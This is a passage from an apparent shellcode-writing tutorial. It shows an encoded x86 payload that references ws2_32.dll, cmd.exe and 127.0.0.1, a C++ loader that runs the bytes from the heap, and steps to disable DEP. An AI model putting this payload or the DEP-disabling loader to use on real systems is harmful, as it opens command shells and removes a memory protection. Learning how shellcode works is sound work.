            "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
            "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
            "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
            "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
            "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
            "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
            "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
            "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
            "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
            "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
            "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
            "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
            "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
            "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
            "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
            "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
            "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

        static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");

        // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
        char *ptr = new char[sizeof(shellcode)];
        memcpy(ptr, shellcode, sizeof(shellcode));
        ((void(*)())ptr)();
    }

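For this code to work, you need to disable DEP (Data Execution Prevention): go to Project→<solution name> Properties, then under Configuration Properties, Linker and Advanced, set Data Execution Prevention (DEP) to No (/NXCOMPAT:NO). This is needed because the shellcode is executed from the heap, which is not executable when DEP is enabled.

static_assert was introduced in C++11 (so VS 2013 CTP is required) and is used here to check that you write

char shellcode[] = "..."

instead of

char *shellcode = "..."

In the first case, sizeof(shellcode) is the effective length of the shellcode, and the shellcode is copied onto the stack. In the second case, sizeof(shellcode) is just the size of the pointer (i.e. 4), and the pointer points to the shellcode in the .rdata section.

To test the shellcode, open a cmd shell: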